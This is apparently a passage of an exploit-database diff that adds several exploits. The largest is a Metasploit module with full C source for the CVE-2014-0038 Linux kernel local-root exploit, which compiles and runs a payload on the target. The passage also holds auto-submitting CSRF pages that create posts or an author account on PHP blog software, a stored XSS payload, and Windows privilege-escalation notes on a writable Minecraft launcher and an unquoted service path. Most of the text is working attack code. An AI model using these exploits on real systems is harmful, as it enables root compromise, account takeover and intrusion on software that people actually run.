[ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1453900']
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ]),
|
||||
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
def kernel_vuln?()
|
||||
os_id = cmd_exec('grep ^ID= /etc/os-release')
|
||||
if os_id == 'ID=ubuntu'
|
||||
kernel = Gem::Version.new(cmd_exec('/bin/uname -r'))
|
||||
case kernel.release.to_s
|
||||
when '3.11.0'
|
||||
if kernel == Gem::Version.new('3.11.0-15-generic') || kernel == Gem::Version.new('3.11.0-12-generic')
|
||||
vprint_good("Kernel #{kernel} is exploitable")
|
||||
return true
|
||||
else
|
||||
print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
|
||||
return false
|
||||
end
|
||||
when '3.8.0'
|
||||
if kernel == Gem::Version.new('3.8.0-19-generic')
|
||||
vprint_good("Kernel #{kernel} is exploitable")
|
||||
return true
|
||||
else
|
||||
print_error("Kernel #{kernel} is NOT vulnerable or NOT exploitable")
|
||||
return false
|
||||
end
|
||||
else
|
||||
print_error("Non-vuln kernel #{kernel}")
|
||||
return false
|
||||
end
|
||||
else
|
||||
print_error("Unknown OS: #{os_id}")
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
if kernel_vuln?()
|
||||
return CheckCode::Appears
|
||||
else
|
||||
return CheckCode::Safe
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
if check != CheckCode::Appears
|
||||
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
|
||||
end
|
||||
|
||||
|
||||
# direct copy of code from exploit-db. I removed a lot of the comments in the title area just to cut down on size
|
||||
|
||||
recvmmsg = %q{
|
||||
/*
|
||||
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
|
||||
recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
|
||||
CVE-2014-0038 / x32 ABI with recvmmsg
|
||||
by rebel @ irc.smashthestack.org
|
||||
-----------------------------------
|
||||
*/
|
||||
|
||||
#define _GNU_SOURCE
|
||||
#include <netinet/ip.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/mman.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/stat.h>
|
||||
#include <fcntl.h>
|
||||
#include <sys/utsname.h>
|
||||
|
||||
#define __X32_SYSCALL_BIT 0x40000000
|
||||
#undef __NR_recvmmsg
|
||||
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
|
||||
#define VLEN 1
|
||||
#define BUFSIZE 200
|
||||
|
||||
int port;
|
||||
|
||||
struct offset {
|
||||
char *kernel_version;
|
||||
unsigned long dest; // net_sysctl_root + 96
|
||||
unsigned long original_value; // net_ctl_permissions
|
||||
unsigned long prepare_kernel_cred;
|
||||
unsigned long commit_creds;
|
||||
};
|
||||
|
||||
struct offset offsets[] = {
|
||||
{"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
|
||||
{"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
|
||||
{"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
|
||||
{NULL,0,0,0,0}
|
||||
};
|
||||
|
||||
void udp(int b) {
|
||||
int sockfd;
|
||||
struct sockaddr_in servaddr,cliaddr;
|
||||
int s = 0xff+1;
|
||||
|
||||
if(fork() == 0) {
|
||||
while(s > 0) {
|
||||
fprintf(stderr,"\rbyte %d / 3.. ~%d secs left \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
|
||||
sleep(1);
|
||||
s--;
|
||||
fprintf(stderr,".");
|
||||
}
|
||||
|
||||
sockfd = socket(AF_INET,SOCK_DGRAM,0);
|
||||
bzero(&servaddr,sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
|
||||
servaddr.sin_port=htons(port);
|
||||
sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
exit(0);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
void trigger() {
|
||||
open("/proc/sys/net/core/somaxconn",O_RDONLY);
|
||||
|
||||
if(getuid() != 0) {
|
||||
fprintf(stderr,"not root, ya blew it!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stderr,"w00p w00p!\n");
|
||||
system("/bin/sh -i");
|
||||
}
|
||||
|
||||
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
|
||||
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
|
||||
_commit_creds commit_creds;
|
||||
_prepare_kernel_cred prepare_kernel_cred;
|
||||
|
||||
// thx bliss
|
||||
static int __attribute__((regparm(3)))
|
||||
getroot(void *head, void * table)
|
||||
{
|
||||
commit_creds(prepare_kernel_cred(0));
|
||||
return -1;
|
||||
}
|
||||
|
||||
void __attribute__((regparm(3)))
|
||||
trampoline()
|
||||
{
|
||||
asm("mov $getroot, %rax; call *%rax;");
|
||||
}
|
||||
|
||||
int main(void)
|
||||
{
|
||||
int sockfd, retval, i;
|
||||
struct sockaddr_in sa;
|
||||
struct mmsghdr msgs[VLEN];
|
||||
struct iovec iovecs[VLEN];
|
||||
char buf[BUFSIZE];
|
||||
long mmapped;
|
||||
struct utsname u;
|
||||
struct offset *off = NULL;
|
||||
|
||||
uname(&u);
|
||||
|
||||
for(i=0;offsets[i].kernel_version != NULL;i++) {
|
||||
if(!strcmp(offsets[i].kernel_version,u.release)) {
|
||||
off = &offsets[i];
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if(!off) {
|
||||
fprintf(stderr,"no offsets for this kernel version..\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
mmapped = (off->original_value & ~(sysconf(_SC_PAGE_SIZE) - 1));
|
||||
mmapped &= 0x000000ffffffffff;
|
||||
|
||||
srand(time(NULL));
|
||||
port = (rand() % 30000)+1500;
|
||||
|
||||
commit_creds = (_commit_creds)off->commit_creds;
|
||||
prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
|
||||
|
||||
mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
|
||||
|
||||
if(mmapped == -1) {
|
||||
perror("mmap()");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
|
||||
|
||||
memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
|
||||
|
||||
if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
|
||||
perror("mprotect()");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
if (sockfd == -1) {
|
||||
perror("socket()");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
sa.sin_family = AF_INET;
|
||||
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
|
||||
sa.sin_port = htons(port);
|
||||
|
||||
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
|
||||
perror("bind()");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
memset(msgs, 0, sizeof(msgs));
|
||||
|
||||
iovecs[0].iov_base = &buf;
|
||||
iovecs[0].iov_len = BUFSIZE;
|
||||
msgs[0].msg_hdr.msg_iov = &iovecs[0];
|
||||
msgs[0].msg_hdr.msg_iovlen = 1;
|
||||
|
||||
for(i=0;i < 3 ;i++) {
|
||||
udp(i);
|
||||
retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
|
||||
if(!retval) {
|
||||
fprintf(stderr,"\nrecvmmsg() failed\n");
|
||||
}
|
||||
}
|
||||
|
||||
close(sockfd);
|
||||
fprintf(stderr,"\n");
|
||||
trigger();
|
||||
}
|
||||
}
|
||||
|
||||
filename = rand_text_alphanumeric(8)
|
||||
executable_path = "#{datastore['WritableDir']}/#{filename}"
|
||||
payloadname = rand_text_alphanumeric(8)
|
||||
payload_path = "#{datastore['WritableDir']}/#{payloadname}"
|
||||
|
||||
def has_prereqs?()
|
||||
gcc = cmd_exec('which gcc')
|
||||
if gcc.include?('gcc')
|
||||
vprint_good('gcc is installed')
|
||||
else
|
||||
print_error('gcc is not installed. Compiling will fail.')
|
||||
end
|
||||
return gcc.include?('gcc')
|
||||
end
|
||||
|
||||
compile = false
|
||||
if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'
|
||||
if has_prereqs?()
|
||||
compile = true
|
||||
vprint_status('Live compiling exploit on system')
|
||||
else
|
||||
vprint_status('Dropping pre-compiled exploit on system')
|
||||
end
|
||||
end
|
||||
if check != CheckCode::Appears
|
||||
fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
|
||||
end
|
||||
|
||||
def upload_and_chmod(fname,fcontent)
|
||||
print_status "Writing to #{fname} (#{fcontent.size} bytes)"
|
||||
rm_f fname
|
||||
write_file(fname, fcontent)
|
||||
cmd_exec("chmod +x #{fname}")
|
||||
register_file_for_cleanup(fname)
|
||||
end
|
||||
|
||||
if compile
|
||||
recvmmsg.gsub!(/system\("\/bin\/sh -i"\);/,
|
||||
"system(\"#{payload_path}\");")
|
||||
upload_and_chmod("#{executable_path}.c", recvmmsg)
|
||||
vprint_status("Compiling #{executable_path}.c")
|
||||
cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
|
||||
register_file_for_cleanup(executable_path)
|
||||
else
|
||||
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg')
|
||||
fd = ::File.open( path, "rb")
|
||||
recvmmsg = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
upload_and_chmod(executable_path, recvmmsg)
|
||||
# overwrite with the hardcoded variable names in the compiled versions
|
||||
payload_filename = 'a0RwAacU'
|
||||
payload_path = "/tmp/#{payload_filename}"
|
||||
end
|
||||
|
||||
upload_and_chmod(payload_path, generate_payload_exe)
|
||||
stime = Time.now
|
||||
vprint_status("Exploiting... May take 13min. Start time: #{stime}")
|
||||
output = cmd_exec(executable_path)
|
||||
output.each_line { |line| vprint_status(line.chomp) }
|
||||
end
|
||||
end
|
94
platforms/php/webapps/40493.html
Executable file
94
platforms/php/webapps/40493.html
Executable file
|
@ -0,0 +1,94 @@
|
|||
# Exploit Title : Spacemarc News - Cross-Site Request
|
||||
Forgery ( Add New Post)
|
||||
# Author : Besim
|
||||
# Google Dork : -
|
||||
# Date : 10/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.spacemarc.it
|
||||
# Software link :
|
||||
http://www.hotscripts.com/listings/jump/download/107255
|
||||
|
||||
|
||||
*########################### CSRF PoC ###############################*
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<script>
|
||||
function submitRequest()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://site_name/news/admin/inserisci.php", true);
|
||||
xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data;boundary=---------------------------7815509202030471153167006625");
|
||||
xhr.withCredentials = true;
|
||||
var body ="-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"titolo\"\r\n" +
|
||||
"\r\n" +
|
||||
"MavilerTester\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"im\"\r\n" +
|
||||
"\r\n" +
|
||||
"IM\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"size\"\r\n" +
|
||||
"\r\n" +
|
||||
"Normale\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"color\"\r\n" +
|
||||
"\r\n" +
|
||||
"Color\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"helpbox\"\r\n" +
|
||||
"\r\n" +
|
||||
"[u]text[/u]\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"testo\"\r\n" +
|
||||
"\r\n" +
|
||||
"tester\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"immagine\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"userfile\";filename=\"\"\r\n" +
|
||||
"Content-Type: application/octet-stream\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"letture\"\r\n" +
|
||||
"\r\n" +
|
||||
"0\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"categoria\"\r\n" +
|
||||
"\r\n" +
|
||||
"1\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"abilita_commenti\"\r\n" +
|
||||
"\r\n" +
|
||||
"on\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"notifica_commenti\"\r\n"+
|
||||
"\r\n" +
|
||||
"on\r\n" +
|
||||
"-----------------------------7815509202030471153167006625\r\n" +
|
||||
"Content-Disposition: form-data; name=\"submit\"\r\n" +
|
||||
"\r\n" +
|
||||
"Inserisci\r\n" +
|
||||
"-----------------------------7815509202030471153167006625--\r\n";
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
}
|
||||
submitRequest();
|
||||
</script>
|
||||
<form action="#">
|
||||
<input type="button" value="Submit request" onclick="submitRequest();" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
*####################################################################*
|
38
platforms/php/webapps/40495.html
Executable file
38
platforms/php/webapps/40495.html
Executable file
|
@ -0,0 +1,38 @@
|
|||
<!--
|
||||
# Exploit Title : *BirdBlog 1.4.0* *- *Cross-Site Request Forgery (*Add New Post*)
|
||||
# Author : *Besim*
|
||||
# Google Dork : -
|
||||
# Date : 11/10/2016
|
||||
# Type : *webapps*
|
||||
# Platform : *PHP*
|
||||
# Software link: http://www.hotscripts.com/listings/jump/download/49011
|
||||
|
||||
*########################### CSRF PoC ###############################*
|
||||
-->
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<form action="http://site_name/path/admin/entries.php?a=post" method="POST">
|
||||
<input type="hidden" name="title" value="Exploit-DB" />
|
||||
<input type="hidden" name="category" value="1" />
|
||||
<input type="hidden" name="music" value="rockrock" />
|
||||
<input type="hidden" name="mood" value="rock" />
|
||||
<input type="hidden" name="moodicon" value="1" />
|
||||
<input type="hidden" name="entry" value="tester" />
|
||||
<input type="hidden" name="excerpt" value="tester" />
|
||||
<input type="hidden" name="password" value="" />
|
||||
<input type="hidden" name="parseurls" value="1" />
|
||||
<input type="hidden" name="parseemoticons" value="1" />
|
||||
<input type="hidden" name="parsebbcode" value="1" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
<script>
|
||||
document.forms[0].submit();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
*####################################################################*
|
||||
-->
|
83
platforms/php/webapps/40496.html
Executable file
83
platforms/php/webapps/40496.html
Executable file
|
@ -0,0 +1,83 @@
|
|||
<!--
|
||||
# Exploit Title : PHP Enter 4.2.7 - Cross-Site Request Forgery (Add New Post)
|
||||
# Author : Besim
|
||||
# Google Dork : -
|
||||
# Date : 11/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.phpenter.net
|
||||
# Software link : http://www.hotscripts.com/listings/jump/download/150217
|
||||
|
||||
########################### CSRF PoC ###############################
|
||||
-->
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<script>
|
||||
function submitRequest()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://site_name/path/addnews.php", true);
|
||||
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------4485886114928592041224662482");
|
||||
xhr.withCredentials = true;
|
||||
var body = "-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"univer\"\r\n" +
|
||||
"\r\n" +
|
||||
"2016074155\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"idblog\"\r\n" +
|
||||
"\r\n" +
|
||||
"1\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"usercc\"\r\n" +
|
||||
"\r\n" +
|
||||
"root\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"editor\"\r\n" +
|
||||
"\r\n" +
|
||||
"1\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"badress\"\r\n" +
|
||||
"\r\n" +
|
||||
"0\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"bname\"\r\n" +
|
||||
"\r\n" +
|
||||
"Test\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"summary\"\r\n" +
|
||||
"\r\n" +
|
||||
"Test\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
|
||||
"Content-Type: application/octet-stream\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"main\"\r\n" +
|
||||
"\r\n" +
|
||||
"0\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"amess\"\r\n" +
|
||||
"\r\n" +
|
||||
"\x3cp\x3eTestttt\x3c/p\x3e\r\n" +
|
||||
"-----------------------------4485886114928592041224662482\r\n" +
|
||||
"Content-Disposition: form-data; name=\"query\"\r\n" +
|
||||
"\r\n" +
|
||||
"Submit\r\n" +
|
||||
"-----------------------------4485886114928592041224662482--\r\n";
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
}
|
||||
submitRequest();
|
||||
</script>
|
||||
<form action="#">
|
||||
<input type="button" value="Submit request" onclick="submitRequest();" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
26
platforms/php/webapps/40505.txt
Executable file
26
platforms/php/webapps/40505.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
# Exploit Title : ApPHP MicroBlog 1.0.2 - Stored Cross
|
||||
Site Scripting
|
||||
# Author : Besim
|
||||
# Google Dork :
|
||||
# Date : 12/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : -
|
||||
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162
|
||||
|
||||
Description :
|
||||
|
||||
Vulnerable link : http://site_name/path/index.php?page=posts&post_id=
|
||||
|
||||
Stored XSS Payload ( Comments ): *
|
||||
|
||||
# Vulnerable URL :
|
||||
http://site_name/path/index.php?page=posts&post_id= - Post comment section
|
||||
# Vuln. Parameter : comment_user_name
|
||||
|
||||
############ POST DATA ############
|
||||
|
||||
task=publish_comment&article_id=69&user_id=&comment_user_name=<script>alert(7);</script>&comment_user_email=besimweptest@yopmail.com&comment_text=Besim&captcha_code=DKF8&btnSubmitPC=Publish
|
||||
your comment
|
||||
|
||||
############ ######################
|
155
platforms/php/webapps/40506.html
Executable file
155
platforms/php/webapps/40506.html
Executable file
|
@ -0,0 +1,155 @@
|
|||
# Exploit Title : ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)
|
||||
# Author : Besim
|
||||
# Google Dork :
|
||||
# Date : 12/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : -
|
||||
# Software link : http://www.scriptdungeon.com/jump.php?ScriptID=9162
|
||||
|
||||
|
||||
|
||||
########################### CSRF PoC ###############################
|
||||
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
function submitRequest()
|
||||
{
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "
|
||||
http://site_name/path/index.php?admin=authors_management", true);
|
||||
xhr.setRequestHeader("Accept",
|
||||
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
|
||||
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
|
||||
xhr.setRequestHeader("Content-Type", "multipart/form-data;
|
||||
boundary=---------------------------25472311920733601781889948655");
|
||||
xhr.withCredentials = true;
|
||||
var body =
|
||||
"-----------------------------25472311920733601781889948655\r\n" +
|
||||
"Content-Disposition: form-data; name=\"mg_action\"\r\n" +
|
||||
"\r\n" +
|
||||
"create\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"mg_rid\"\r\n" +
|
||||
"\r\n" +
|
||||
"-1\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"mg_sorting_fields\"\r\n"
|
||||
+
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"mg_sorting_types\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"mg_page\"\r\n" +
|
||||
"\r\n" +
|
||||
"1\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"mg_operation\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"mg_operation_type\"\r\n"
|
||||
+
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"mg_operation_field\"\r\n"
|
||||
+
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"mg_search_status\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"mg_language_id\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"show_about_me\"\r\n" +
|
||||
"\r\n" +
|
||||
"0\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"account_type\"\r\n" +
|
||||
"\r\n" +
|
||||
"author\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"last_login\"\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"first_name\"\r\n" +
|
||||
"\r\n" +
|
||||
"Mehmet\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"last_name\"\r\n" +
|
||||
"\r\n" +
|
||||
"mersin\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"email\"\r\n" +
|
||||
"\r\n" +
|
||||
"mehmet@yopmail.com\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"user_name\"\r\n" +
|
||||
"\r\n" +
|
||||
"Zer0\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"password\"\r\n" +
|
||||
"\r\n" +
|
||||
"mehmet\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"avatar\";
|
||||
filename=\"\"\r\n" +
|
||||
"Content-Type: application/octet-stream\r\n" +
|
||||
"\r\n" +
|
||||
"\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"about_me\"\r\n" +
|
||||
"\r\n" +
|
||||
"denemddendemdendjendk\r\n" +
|
||||
"-----------------------------25472311920733601781889948655\r\n"
|
||||
+
|
||||
"Content-Disposition: form-data; name=\"is_active\"\r\n" +
|
||||
"\r\n" +
|
||||
"1\r\n" +
|
||||
|
||||
"-----------------------------25472311920733601781889948655--\r\n";
|
||||
var aBody = new Uint8Array(body.length);
|
||||
for (var i = 0; i < aBody.length; i++)
|
||||
aBody[i] = body.charCodeAt(i);
|
||||
xhr.send(new Blob([aBody]));
|
||||
}
|
||||
submitRequest();
|
||||
</script>
|
||||
<form action="#">
|
||||
<input type="button" value="Submit request"
|
||||
onclick="submitRequest();" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
####################################################################
|
29
platforms/windows/local/40494.txt
Executable file
29
platforms/windows/local/40494.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
Minecraft Launcher: https://minecraft.net
|
||||
Version: 1.6.61
|
||||
By Ross Marks: http://www.rossmarks.co.uk
|
||||
Exploit-db: https://www.exploit-db.com/author/?a=8724
|
||||
Category: Local
|
||||
Tested on: Windows 10 x86/x64
|
||||
|
||||
1) Insecure File Permissions Local Privilege Escalation
|
||||
|
||||
Minecraft's launcher (minecraftLauncher.exe) suffers from an elevation of privileges
|
||||
vulnerability which can be used by a simple user that can change the executable file
|
||||
with a binary of choice. The vulnerability exist due to the improper permissions,
|
||||
with the 'F' flag (Full) for 'Users' group, making the entire directory
|
||||
'Minecraft' and its files and sub-dirs world-writable.
|
||||
|
||||
This would allow an attacker the ability to inject code or replace the MinecraftLauncher
|
||||
executable and have it run in the context of the system.
|
||||
|
||||
PoC:
|
||||
|
||||
C:\Program Files (x86)\Minecraft>icacls MinecraftLauncher.exe
|
||||
MinecraftLauncher.exe BUILTIN\Users:(I)(F)
|
||||
NT AUTHORITY\SYSTEM:(I)(F)
|
||||
BUILTIN\Administrators:(I)(F)
|
||||
PENTEST\ross.marks:(I)(F)
|
||||
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
|
||||
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)
|
||||
|
||||
Successfully processed 1 files; Failed processing 0 files
|
29
platforms/windows/local/40497.txt
Executable file
29
platforms/windows/local/40497.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
#########################################################################
|
||||
# Exploit Title: sheed AntiVirus Unquoted Service Path Privilege Escalation
|
||||
# Date: 11/10/2016
|
||||
# Author: Amir.ght
|
||||
# Vendor Homepage: http://sheedantivirus.ir/
|
||||
# Software Link:http://dl.sheedantivirus.ir/setup.exe
|
||||
#version : 2.3 (Latest)
|
||||
# Tested on: Windows 7
|
||||
##########################################################################
|
||||
|
||||
sheed AntiVirus installs a service with an unquoted service path
|
||||
To properly exploit this vulnerability,
|
||||
the local attacker must insert an executable file in the path of the service.
|
||||
Upon service restart or system reboot, the malicious code will be run
|
||||
with elevated privileges.
|
||||
-------------------------------------------
|
||||
C:\>sc qc ShavProt
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: ShavProt
|
||||
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 0 IGNORE
|
||||
